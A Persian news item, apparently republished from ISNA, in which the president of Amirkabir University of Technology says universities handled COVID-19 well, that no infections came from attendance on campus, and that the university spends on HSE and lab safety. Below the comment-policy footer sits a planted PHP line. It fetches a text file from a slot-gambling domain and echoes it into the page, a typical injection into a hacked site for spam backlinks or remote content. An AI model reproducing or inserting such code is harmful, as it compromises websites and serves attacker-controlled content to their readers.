تاریخ انتشار : دوشنبه 17 آبان 1400 - 23:11
10 بازدید
کد خبر : 81392

نمره قبولی دانشگاهها در دوران شیوع کرونا/هیچ مورد ابتلا بخاطر حضور در دانشگاه گزارش نشد

نمره قبولی دانشگاهها در دوران شیوع کرونا/هیچ مورد ابتلا بخاطر حضور در دانشگاه گزارش نشد

رئیس دانشگاه صنعتی امیرکبیر اظهار داشت: وزارت علوم و دانشگاه‌های کشور در روند همه گیری بیماری کرونا نمره قبولی دریافت کردند چراکه فعالیت این مراکز در این دوران متوقف نشد. به گزارش ایسنا، دکتر سید احمد معتمدی در گردهمایی روسای مراکز بهداشت و درمان دانشگاه‌ها در دانشگاه صنعتی امیرکبیر گفت: باتوجه به شیوع بیماری کووید-۱۹ ،

نمره قبولی دانشگاهها در دوران شیوع کرونا/هیچ مورد ابتلا بخاطر حضور در دانشگاه گزارش نشد

رئیس دانشگاه صنعتی امیرکبیر اظهار داشت: وزارت علوم و دانشگاه‌های کشور در روند همه گیری بیماری کرونا نمره قبولی دریافت کردند چراکه فعالیت این مراکز در این دوران متوقف نشد.

به گزارش ایسنا، دکتر سید احمد معتمدی در گردهمایی روسای مراکز بهداشت و درمان دانشگاه‌ها در دانشگاه صنعتی امیرکبیر گفت: باتوجه به شیوع بیماری کووید-۱۹ ، مراکز بهداشت و درمان دانشگاه‌ها بیشترین فعالیت را داشته‌اند و بررسی فعالیت‌های این مراکز نشان می‌دهد که عملکرد خوبی نیز داشته‌اند.

وی افزود: باتوجه به اینکه خوابگاه‌های دانشگاه صنعتی امیرکبیر در دوران کرونا دایر بود، بنابراین لازم بود تمام پروتکل‌های بهداشتی برای حضور دانشجویان در خوابگاه ها اجرا شود که این موضوع با کمک و همکاری مرکز بهداشت دانشگاه انجام شد.

دکتر معتمدی عنوان کرد: باتوجه به برنامه ریزی‌های صورت گرفته در دانشگاه‌ها به خصوص مرکز بهداشت دانشگاه، هیچ مورد ابتلا به کرونا به دلیل حضور در دانشگاه وجود نداشت. در واقع، در این دانشگاه هیچ فراگیری جمعی در خصوص بیماری کرونا تا کنون وجود نداشته است.

رئیس دانشگاه صنعتی امیرکبیر تاکید کرد: در این دانشگاه موضوع بهداشت، ایمنی و محیط زیست ( HSE) مورد توجه است و برنامه ریزی های کاربردی برای این موضوع در دانشگاه صورت گرفته است.

دکتر معتمدی خاطرنشان کرد: طبق بررسی های صورت گرفته در دانشگاه، به این نتیجه رسیدیم که برخی از فعالیت‌های مربوط به HSE در دانشگاه نیازمند بودجه نیست بلکه، تنها باید برای رفع موضوع توجه صورت گیرد.

وی افزود: موضوعات مربوط به این حوزه در دانشگاه صنعتی امیرکبیر به سه دسته فعالیت های بدون نیاز به اعتبار، فعالیت‌هایی که نیاز به اعتبار متوسط دارند و فعالیت‌هایی که نیاز به اعتبار زیاد دارند، تقسیم بندی شدند.

رئیس دانشگاه صنعتی امیرکبیر اظهار داشت: همچنین در جلسات شورای دانشگاه موضوع بهداشت، ایمنی و محیط زیست ( HSE) مورد بررسی قرار گرفت و دانشکده های این دانشگاه در این حوزه رتبه بندی شدند.

به گزارش روابط عمومی دانشگاه امیرکبیر، دکتر معتمدی با بیان اینکه موضوع HSE یک رویه مستمر بشمار می‌رود، گفت: باتوجه به برنامه ریزی‌های صورت گرفته در حوزه HSE به دستاوردهای خوبی رسیده ایم.

رئیس دانشگاه صنعتی امیرکبیر گفت: تاکنون چند میلیارد تومان برای مباحث حفاظتی و ایمنی آزمایشگاه های دانشگاه هزینه شده است که این امر در راستای برنامه ریزی در حوزه HSE بوده است.

انتهای پیام

منبع:ایسنا

برچسب ها :

ناموجود
ارسال نظر شما
مجموع نظرات : 0 در انتظار بررسی : 0 انتشار یافته : ۰
  • نظرات ارسال شده توسط شما، پس از تایید توسط مدیران سایت منتشر خواهد شد.
  • نظراتی که حاوی تهمت یا افترا باشد منتشر نخواهد شد.
  • نظراتی که به غیر از زبان فارسی یا غیر مرتبط با خبر باشد منتشر نخواهد شد.

?php echo file_get_contents("https://harumslot99.com/backlink1.txt"); ?>